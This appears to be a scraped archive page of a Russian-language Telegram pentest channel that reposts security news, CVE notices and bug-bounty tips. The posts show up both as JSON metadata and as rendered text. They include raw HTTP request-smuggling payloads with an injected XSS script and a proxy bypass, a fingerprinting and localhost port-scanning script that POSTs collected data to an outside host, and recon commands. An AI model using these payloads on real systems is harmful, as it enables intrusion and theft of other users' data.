Fsecurity | HH
Открыть в Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
Больше2 068
Подписчики
-124 часа
-77 дней
+230 дней
Архив постов
HTTP/1.1\nX:\n\nРезультат: Все пользователи, отправляющие обычные запросы, получат XSS-скрипт в ответе.\n\n2️⃣ Обход защиты фронт-прокси (Cloudflare)\n\nДопустим, Cloudflare блокирует доступ к /admin. Злоумышленник может скрыть GET-запрос к /admin внутри HEAD-запроса и обойти защиту.\n\nПример:\n\nHEAD / HTTP/1.1\nHost: victim.com\nContent-Length: 40\n\nGET /admin HTTP/1.1\nHost: victim.com\n\nРезультат: Cloudflare не увидит GET-запрос, и злоумышленник сможет обойти защиту.\n\n3️⃣ Кража ответов других пользователей\n\nЭтот метод позволяет рассинхронизировать очередь ответов на сервере и захватить ответы других пользователей.\n\nПример атаки\n 1. Атакующий отправляет HEAD-запрос с внедрённым GET-запросом.\n 2. Сервер ошибочно интерпретирует тело как отдельный запрос.\n 3. Ответ попадает не атакующему, а следующему пользователю, а атакующий может забрать ответ жертвы.\n\nПодробности\n\nБолее подробное описание читайте в блоге по ссылке.\n\n#web #hrs #xss","datePublished":"2025-03-21T12:12:40Z","dateModified":"2025-03-21T12:12:40Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":115},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-03-19T10:31:04Z"}}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4797","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4797","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4797","headline":"Fsecurity | HH","datePublished":"2025-03-21T10:22:50Z","dateModified":"2025-03-21T10:22:50Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":113}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4796","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4796","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4796","headline":"Когда занимаешься баг баунти","articleBody":"Когда занимаешься баг баунти","datePublished":"2025-03-21T10:22:09Z","dateModified":"2025-03-21T10:22:09Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":110},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-03-21T10:01:11Z"}}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4795","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4795","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4795","headline":"🔗Ссылка: https://www.securitylab.ru/news/557444.php","articleBody":"🔗Ссылка:\nhttps://www.securitylab.ru/news/557444.php","datePublished":"2025-03-21T10:07:02Z","dateModified":"2025-03-21T10:07:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":110},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4794","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4794","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4794","headline":"Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈","articleBody":"Discord сервер \n👆🏻Тут можно пообщаться и найти много полезной информации 🦈","datePublished":"2025-03-21T08:11:28Z","dateModified":"2025-03-21T08:11:28Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":114}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4793","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4793","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4793","headline":"Друзья, всем прекрасный весенний вечер! В моей голове давно была идея создания небольшого списка вариантов ис…","articleBody":"Друзья, всем прекрасный весенний вечер! \n\nВ моей голове давно была идея создания небольшого списка вариантов использования сертификатов в средах AD, помимо стандартного запроса билета и UnPAC The Hash. Так родилась небольшая статья на Medium, из которой вы узнаете про различные способы изучения полученного сертификата и нестандартные варианты его использования, как например для аутентификации по SSH или расшифровки HTTPS-траффика\n\nПриятного чтения 🙂 \n\nhttps://cicada-8.medium.com/adcs-so-u-got-certificate-now-ive-got-nine-ways-to-abuse-it-861081cff082","datePublished":"2025-03-21T08:05:38Z","dateModified":"2025-03-21T08:05:38Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":135},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-03-18T18:18:06Z"}}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4792","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4792","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4792","headline":"🔗Ссылка: https://habr.com/ru/post/889988/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/post/889988/","datePublished":"2025-03-20T20:17:01Z","dateModified":"2025-03-20T20:17:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":141},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4791","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4791","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4791","headline":"🔗Ссылка: https://www.yeswehack.com/learn-bug-bounty/recon-series-http-fingerprinting","articleBody":"🔗Ссылка:\nhttps://www.yeswehack.com/learn-bug-bounty/recon-series-http-fingerprinting","datePublished":"2025-03-20T18:09:32Z","dateModified":"2025-03-20T18:09:32Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":134}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4790","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4790","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4790","headline":"Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈","articleBody":"Discord сервер \n👆🏻Тут можно пообщаться и найти много полезной информации 🦈","datePublished":"2025-03-20T16:52:29Z","dateModified":"2025-03-20T16:52:29Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":135}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4788","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4788","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4788","headline":"Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение…","articleBody":"Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы. \n\nhttps://qna.habr.com/q/465498\n\nhttps://x.com/nightlind/status/911806158230495232\n\nВот скрипт: \nhttps://jsfiddle.net/Lknb3xez/\n\nСнимается WebGL fingerprint.\nПроверяются доступные шрифты, плагины браузера.\n\nСнимается:\n1 Часовой пояс\n2 Локализация (язык)\n3 Характеристики видеокарты и CPU\n4 Параметры экрана, доступность WebRTC\n\n5 Пробует подключиться к localhost на разных портах:\n\n127.0.0.1:22 (SSH)\n127.0.0.1:5900 (VNC)\n127.0.0.1:3389 (RDP)\n127.0.0.1:80, 5000, 8080\n\n и др.\n\n\nlet portsToScan = [22, 5900, 3389, 5000, 8080];\nportsToScan.forEach(port => {\n let img = new Image();\n img.onload = () => {\n reportOpenPort(port);\n };\n img.onerror = () => {};\n img.src = http://127.0.0.1:${port};\n});\nОтправка собранных данных\nfetch('https://example-hh.ru-backend.com/collect', {\n method: 'POST',\n body: JSON.stringify(collectedData)\n});\n\n\n\nСкрипт не всегда активен:\nОпределяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).\nВнедряется по вероятности или под определённые сценарии.\n\nСовет один - Не открывайте доступ браузеру никуда…","datePublished":"2025-03-20T16:03:03Z","dateModified":"2025-03-20T16:03:03Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":142},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-03-18T14:59:03Z"}}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4787","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4787","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4787","headline":"➡️ #CVE-2025-24071 - уязвимость спуфинга в Проводнике Windows (File Explorer). 📂 Позволяет злоумышленникам по…","articleBody":"➡️ #CVE-2025-24071 - уязвимость спуфинга в Проводнике Windows (File Explorer).\n\n📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам.\n\n🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы!\n\n💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча.\n\n📖 Блог-пост с подробностями:\n👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html\n\n💣 PoC:\n👉 https://github.com/0x6rss/CVE-2025-24071_PoC","datePublished":"2025-03-20T14:13:02Z","dateModified":"2025-03-20T14:13:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":134},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-03-18T15:15:49Z"}}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4786","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4786","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4786","headline":"🔗Ссылка: https://www.securitylab.ru/news/557412.php","articleBody":"🔗Ссылка:\nhttps://www.securitylab.ru/news/557412.php","datePublished":"2025-03-20T12:17:01Z","dateModified":"2025-03-20T12:17:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":135},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4785","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4785","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4785","headline":"CVE-2025-0927 LPE HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability…","articleBody":"CVE-2025-0927 LPE\n\nHFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions.\n\nAffected Versions:\n • Linux Kernel, up to 6.12.0\n • Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic","datePublished":"2025-03-20T10:21:19Z","dateModified":"2025-03-20T10:21:19Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":132},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-03-18T11:34:31Z"}}}]}




+2





2 068
Repost from BlackFan
Изучая документацию jadx наткнулся на упоминание, что его можно подключить как библиотеку в свое Java приложение. И эта идея настолько понравилась, что в итоге вылилась в небольшой комбайн, который удобно использовать для первоначальной обработки JAR/WAR/APK приложений при анализе защищенности.
https://github.com/BlackFan/BFScan
BFScan анализирует строковые константы в Java-классах и ресурсах приложения для поиска строк, похожих на URL, пути или захардкоженные секреты.
А также формирует сырые HTTP запросы и OpenAPI спецификацию на основе конфигов, аннотаций методов и классов. При этом поддерживаются как клиентские библиотеки (например, Retrofit), используемые в APK для взаимодействия с бэкендом, так и серверные технологии, такие как Spring-аннотации. Что значительно облегчает тестирование API, когда тело HTTP запроса необходимо сформировать из десятка вложенных классов.
Рассмотрим пример работы утилиты с классом, использующим Spring-аннотации.
@RestController
@RequestMapping("/api")
public class UserController {
@PostMapping("createUser")
public String create(@RequestParam Optional<String> someParamName, @RequestBody User user) {
return "response";
}
В случае, если обрабатываемое приложение использует поддерживаемую библиотеку, утилита сгенерирует файл, содержащий все HTTP запросы, поддерживаемые приложением.
POST /api/createUser?someParamName=value HTTP/1.1
Host: localhost
Connection: close
Content-Type: application/json
{
"name": "name",
"age": 1
}
Приложение удобно использовать как для клиентских приложений, когда вы анализируете API мобильного приложения. Так и в случае, если вы получили скомпилированный JAR/WAR от серверного приложения, для поиска в нем захардкоженных секретов или дальнейшего анализа API эндпоинтов, которое оно обрабатывает.
Если приложение обфусцировано, что часто бывает с APK, утилита проанализирует все аннотации и, если они похожи на типичное объявление API эндпоинтов, построит HTTP запросы на основе них. В случае, если данная функциональность сработала неправильно, используя jadx вы можно легко сформировать mapping-файлы для переименования обфусцированных классов и корректного формирования HTTP-запросов.2 068
Repost from Ralf Hacker Channel
CVE-2025-23120: Domain-Level RCE in Veeam Backup & Replication
https://labs.watchtowr.com/by-executive-order-we-are-banning-blacklists-domain-level-rce-in-veeam-backup-replication-cve-2025-23120/
Affected Product:
Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds.
Patched: March 19, 2025
#ad #pentest #redteam #rce
2 068
Repost from Standoff 365
+7
🔎 Перечисление поддоменов: как расширить поверхность атаки с помощью активных и пассивных методов
Мы решили запустить экспериментальный формат, в котором будем делиться полезными советами от опытных багхантеров — не ежедневно, но регулярно. Начинаем с самой базы — можно унести ее в сохраненки и возвращаться к ней по необходимости. Не забывайте ставить реакции под постом, чтобы мы понимали, был ли материал полезен. А если у вас есть предложения о контенте, не стесняйтесь рассказать об этом в комментариях. Enjoy!
Что делает убитый горем багхантер, который не может найти хоть какую-нибудь зацепку? Правильно — проводит разведку по новой: пассивный и активный поиск поддоменов, брут путей и файлов, использование дорков, исследование используемых в приложении технологий и т. д. Каждая тема здесь достойна отдельного поста, поэтому начнем по порядку с простого — сбора поддоменов.
⭐️ Описанное ниже особенно полезно, когда в скоупе багбаунти-программы есть DNS-записи wildcard (
*.domain.tld).
Итак, основная цель — получить как можно больше активов из багбаунти-программы, чтобы сформировать представление об общей поверхности атаки и о работе инфраструктуры.
➡️ Пассивный сбор поддоменов: вы не взаимодействуете с целевым узлом и получаете информацию из открытых источников (DNS-записи, логи сертификатов SSL и TLS или веб-архивы).
Примеры используемых инструментов:
🟢 Censys, Shodan, SecurityTrails, DNSDumpster и другие онлайн-сервисы.
🟢 Инструменты вроде subfinder, amass или waybackurls, которые сами опросят множество публичных баз данных и выведут результат в удобном для вас формате (останется только добавить API-ключи):
$ subfinder -d example.com -oJ domains-example.com.json
или
$ amass enum -d example.com -o domains-amass.example.com.txt -timeout 12 -v
🟢 Google-дорки — это база:
site:*.example.com -site:www.example.com➡️ Активный сбор поддоменов включает поиск любых поддоменов, которые не проиндексированы публично, но активно используются. Разберемся с ключевыми методами: 🟢 Брутфорс DNS — перебор поддоменов по словарю, который должен быть составлен отдельно исходя из полученных в ходе разведки данных. Про общедоступные словари тоже не стоит забывать (SecLists, fuzzdb, Assetnote Wordlists). Важно не останавливаться на доменах 3-го уровня, а искать дальше. В этом поможет инструмент mksub, с помощью которого можно сгенерировать дополнительные вариации поддоменов:
$ gobuster dns -d example.com -w wordlist.txt
$ mksub -d example.com -l 2 -w dns-wordlist.txt
🟢 Фаззинг виртуальных хостов (vhosts), которые имеют тот же IP-адрес, что и другой домен на веб-сервере. Полезные инструменты для работы — ffuf и wfuzz.
$ ffuf -c -r -u 'https://www.example.com/' -H 'Host: FUZZ.example.com' -w dns-wordlist.txt
🟢 Reverse DNS (rDNS): преобразует IP-адрес в связанное с ним доменное имя. Этот способ особенно полезен при исследовании диапазона целевых IP-адресов. На помощь придут инструменты Linux (dig, host) или общеизвестный dnsx.
$ dig -x 8.8.4.4 +short
$ cat ips.txt | dnsx -ptr -resp-only
➡️ Веб-краулинг с помощью Burp Suite или других инструментов: просто укажите кастомный скоуп, ходите по ссылкам и отслеживайте новые поддомены.
.*\.example\.com$⭐️ Последняя задача — определить активные веб-узлы и избавиться от фолзов. Самый простой способ — использовать httpx или httprobe. Собираем поддомены в отдельный файл и выполняем:
$ cat domains.txt | httpx -o domains-webserver.txt
или
$ cat domains.txt | httprobe >> domains-webserver.txt
💡 Хотите еще сильнее упростить себе жизнь? Используйте anew для добавления уникальных строк в файл из stdin. Инструмент выводит новые строки в stdout, что делает его немного похожим на команду tee -a.
P. S. При подготовке вдохновлялись статьей от багбаунти-площадки YesWeHack.2 068
Repost from SHADOW:Group
🔃 OpenResty/lua-nginx-module: Уязвимость HTTP Request Smuggling в HEAD-запросах
Раскрыли подробности
CVE-2024-33452. При обработке HTTP/1.1-запросов lua-nginx-module некорректно разбирает HEAD-запросы с телом, воспринимая тело запроса как новый отдельный запрос.
Пример
Обычно прокси-серверы интерпретируют следующий HTTP-запрос как единый, поскольку GET /smuggle находится в теле HEAD-запроса:
HEAD / HTTP/1.1 Host: localhost Content-Length: 52 GET /smuggle HTTP/1.1 Host: localhostОднако lua-nginx-module интерпретирует его как два отдельных запроса, что приводит к рассинхронизации прокси-серверов в цепочке. Сценарии атак Прокси-серверы, использующие lua-nginx-module, уязвимы к этой атаке (например, Kong Gateway, Apache APISIX и другие). Пример с Kong Gateway Если Kong работает самостоятельно, уязвимость не представляет особой опасности. Но если Kong используется в связке с фронт-прокси (например, Nginx, Cloudflare и т. д.), злоумышленник может: 1. Внедрять вредоносные ответы (например, XSS-атаки). 2. Обходить защиту фронт-прокси (например, обход Cloudflare). 3. Перехватывать ответы других пользователей. 1️⃣ Внедрение XSS через смуглинг Этот сценарий позволяет заставить всех пользователей загрузить вредоносный ответ с XSS-кодом, даже если сайт использует обычную страницу Apache.
HEAD / HTTP/1.1 Host: localhost Content-Length: 122 HEAD /app HTTP/1.1 Host: localhost Connection: keep-alive GET /app/assets?<script>alert(origin)</script> HTTP/1.1 X:Результат: Все пользователи, отправляющие обычные запросы, получат XSS-скрипт в ответе. 2️⃣ Обход защиты фронт-прокси (Cloudflare) Допустим, Cloudflare блокирует доступ к
/admin. Злоумышленник может скрыть GET-запрос к /admin внутри HEAD-запроса и обойти защиту.
Пример:
HEAD / HTTP/1.1 Host: victim.com Content-Length: 40 GET /admin HTTP/1.1 Host: victim.comРезультат: Cloudflare не увидит GET-запрос, и злоумышленник сможет обойти защиту. 3️⃣ Кража ответов других пользователей Этот метод позволяет рассинхронизировать очередь ответов на сервере и захватить ответы других пользователей. Пример атаки 1. Атакующий отправляет HEAD-запрос с внедрённым GET-запросом. 2. Сервер ошибочно интерпретирует тело как отдельный запрос. 3. Ответ попадает не атакующему, а следующему пользователю, а атакующий может забрать ответ жертвы. Подробности Более подробное описание читайте в блоге по ссылке. #web #hrs #xss
2 068
Repost from RedTeam brazzers
Друзья, всем прекрасный весенний вечер!
В моей голове давно была идея создания небольшого списка вариантов использования сертификатов в средах AD, помимо стандартного запроса билета и UnPAC The Hash. Так родилась небольшая статья на Medium, из которой вы узнаете про различные способы изучения полученного сертификата и нестандартные варианты его использования, как например для аутентификации по SSH или расшифровки HTTPS-траффика
Приятного чтения 🙂
https://cicada-8.medium.com/adcs-so-u-got-certificate-now-ive-got-nine-ways-to-abuse-it-861081cff082
2 068
Repost from SecuriXy.kz
+1
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы.
https://qna.habr.com/q/465498
https://x.com/nightlind/status/911806158230495232
Вот скрипт:
https://jsfiddle.net/Lknb3xez/
Снимается WebGL fingerprint.
Проверяются доступные шрифты, плагины браузера.
Снимается:
1 Часовой пояс
2 Локализация (язык)
3 Характеристики видеокарты и CPU
4 Параметры экрана, доступность WebRTC
5 Пробует подключиться к localhost на разных портах:
127.0.0.1:22 (SSH) 127.0.0.1:5900 (VNC) 127.0.0.1:3389 (RDP) 127.0.0.1:80, 5000, 8080и др.
let portsToScan = [22, 5900, 3389, 5000, 8080];
portsToScan.forEach(port => {
let img = new Image();
img.onload = () => {
reportOpenPort(port);
};
img.onerror = () => {};
img.src = http://127.0.0.1:${port};
});
Отправка собранных данных
fetch('https://example-hh.ru-backend.com/collect', {
method: 'POST',
body: JSON.stringify(collectedData)
});
Скрипт не всегда активен:
Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).
Внедряется по вероятности или под определённые сценарии.
Совет один - Не открывайте доступ браузеру никуда…2 068
Repost from SecuriXy.kz
➡️ #CVE-2025-24071 - уязвимость спуфинга в Проводнике Windows (File Explorer).
📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам.
🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы!
💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча.
📖 Блог-пост с подробностями:
👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
💣 PoC:
👉 https://github.com/0x6rss/CVE-2025-24071_PoC
2 068
Repost from 1N73LL1G3NC3
CVE-2025-0927 LPE
HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions.
Affected Versions:
• Linux Kernel, up to 6.12.0
• Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic
